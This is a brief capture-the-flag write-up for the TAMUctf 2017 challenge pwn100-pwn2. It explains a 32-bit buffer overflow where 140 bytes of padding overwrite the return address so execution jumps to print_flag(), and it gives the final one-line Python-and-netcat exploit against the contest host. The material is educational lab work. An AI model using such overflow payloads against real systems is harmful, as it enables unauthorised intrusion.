TAMUctf 2017 : pwn100-pwn2

nc pwn.ctf.tamu.edu 4321
The flag printing functionality has been deprecated.


So.. another 32bit binary vulnerable to buffer overflow

..w/ 140 bytes of junk we can overwrite the return pointer.

but.. return to where?

and.. in this case, we can directly execute the function print_flag()

ez pz lemon sqz :)

Final remote exploit

python -c 'print "A"*140 + "\x4b\x85\x04\x08"*1 ' | nc pwn.ctf.tamu.edu 4321